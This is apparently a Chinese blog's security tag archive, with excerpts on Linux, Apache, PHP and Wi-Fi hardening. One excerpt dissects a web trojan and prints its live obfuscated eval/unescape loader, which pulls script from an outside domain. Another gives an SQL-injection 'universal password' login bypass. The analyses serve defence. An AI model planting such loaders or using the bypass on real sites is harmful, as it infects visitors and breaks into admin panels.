标签存档: 安全

使用pam模块pam_tally2设置Linux用户连续N次输入错误密码自动锁定X分钟

测试系统 :Asianux 3.0 sp2 x86
kernel : 2.6.18-128.7
pam版本:pam-0.99.6.2-4.1AXS3
操作方法:
阅读全文——共1013字

家用小型办公场所用 无线路由(无线接入点AP)安全设置要点/防蹭网/防监听/

无线网络的设置,主要有以下几点:
1) 无线信号一定要加密,就是要设置无线密。否则你上网的通信数据就通过无线明文在你的周围传输,很容易被监听的。如果你在登录银行账号、在线交易时被监听了…. 结果您懂的。
2) 加密方式:建议使用 WPA-PSK/WPA2-PSK加密,它的加密强度比wep好得多。如果要使只支持wep加密的wifi设备,那没办法,只能使用wep了。比如很多wifi手机,都是只能使用wep加密的。
3) 使用较长的无线密钥,增加密钥复杂度;可以使用16进制码的密钥,而且是使用非可打印ascii码的16进制密钥。
阅读全文——共528字

PHP漏洞全解(PHP安全性/命令注入/脚本植入/xss跨站/SQL注入/伪跨站请求/Session劫持/HTTP响应拆分/文件上传漏洞)

目录
PHP漏洞全解(一)-PHP网站的安全性问题
PHP漏洞全解(二)-命令注入攻击
PHP漏洞全解(三)-客户端脚本植入
阅读全文——共18259字

apache安全配置:禁用目录的php执行权限

当以 Apache 的模块方式运行 PHP 时,也可以通过 Apache 的配置文件(例如 httpd.conf)和 .htaccess 文件中的指令来修改 PHP 的配置选项(需要“AllowOverride Options”或“AllowOverride All”权限)。
在httpd.conf文件里有关在该目录的设定里加上 (PHP4以上版本)
“php_admin_flag engine off”
例:
阅读全文——共658字

linux下apache+php安全设置:apache虚拟主机间隔离

1、实现虚拟主机笼环境
a.upl.com /wwwroot/a.upl.com/
b.upl.com /wwwroot/b.upl.com/
<VirtualHost *:80>
阅读全文——共2233字

CentOS的安全配置

CentOS的安全配置
一、系统安全记录文件
操作系统内部的记录文件是检测是否有网络入侵的重要线索。如果您的系统是直接连到Internet,您发现有很多人对您的系统做Telnet/FTP登录尝试,可以运行”#more /var/log/secure | grep refused”来检查系统所受到的攻击,以便采取相应的对策,如使用SSH来替换Telnet/rlogin等。
二、启动和登录安全性
阅读全文——共5758字

一次web木马解剖

本文起源于:http://www.path8.net/tn/archives/4235
木马解剖:
这是一段JS木马,请一定谨慎,不要在浏览器中执行。但在本站本文中阅读是安全的,本文url如下http://www.path8.net/tn/archives/4235 ;但笔者不能保证对本文的转载也是安全。
<script>eval(unescape(“%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%65%73%73%74%68%65%6E%61%6D%69%6E%75%74%65%68%61%6E%64%6C%65%2E%63%6F%6D%2F%6A%73%2E%70%68%70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B”))</script>
阅读全文——共3691字

Unix和Windows在系统安全设计理念上的对比

在系统安全方面,Unix和Windows最大的不同在于,Unix系统强大的安全性是因为它拥有良好的安全架构设计,不得不承认一个事实,在安全 方面双方有很多相同点,而微软似乎更想将Unix的安全特性全部纳入其Windows系统,但微软有一点没有做好的是,其安全性设计都是驾临于操作系统之 上,而不是从系统架构出发考虑的。
例如,Windows中的特权隔离长期以来对Windows安全都有一个问题,在Windows架构层面的确有一些特权隔离特性,但它只是一个半心半意的实现,依赖于用户级功能行为和使用意图。
系统模块化是Unix架构安全的另一个实例,而这是Windows所缺乏的。每一个Windows版本都捆绑了大量的应用程序,如IE浏览器。即使 一次针对浏览器的攻击,也很容易获得内核空间的访问权,从而获得整个系统的控制权,而这种情况在Unix的基础系统中是不存在的。
阅读全文——共1601字

分析PHP网站下的万能密码

  如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。其实说这话的人没有好好想过,更没有尝试过用万能密码进 PHP的后台。其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。
  如果你用这样的万能密码‘or’=’or’,当然进不去,理由是GPC开启的时候单引号会被转换。
  PHP注入时我常用的万能密码是:‘or 1=1/*.
  那我们分析一下为什么这可以进后台。
阅读全文——共813字

linux安全:了解linux病毒知识,做好操作系统Linux病毒防护

对使用Windows的人来说,病毒无处不在,预防网站入侵各种各样的新型病毒层出不穷,近年来,一种类似Unix的操作系统也在发展壮大,开始走进我们的视野,并在各领域内得到应用,它就是Linux系统,对于受病毒困扰的用户来说,Linux会是一块没有病毒的乐土吗?
一、当心Linux病毒
在Linux出现之初,由于其最初的优秀设计,似乎具有先天病毒免疫能力,所以当时有许多人相信不会有针对Linux的病毒出现,但是Linux终于也不能例外。1996年秋,澳大利亚一个叫VLAD的组织用汇编语言编写了据称是Linux系统下的第一个病毒的Staog,它专门感染二进制文件,并通过三种方式去尝试得到root权限。当然,设计Staog病毒只是为了演示和证明Linux有被病毒感染的潜在危险,它并没有对感染的系统进行任何损坏行动。
阅读全文——共3135字

Pages: 1 2 3 Next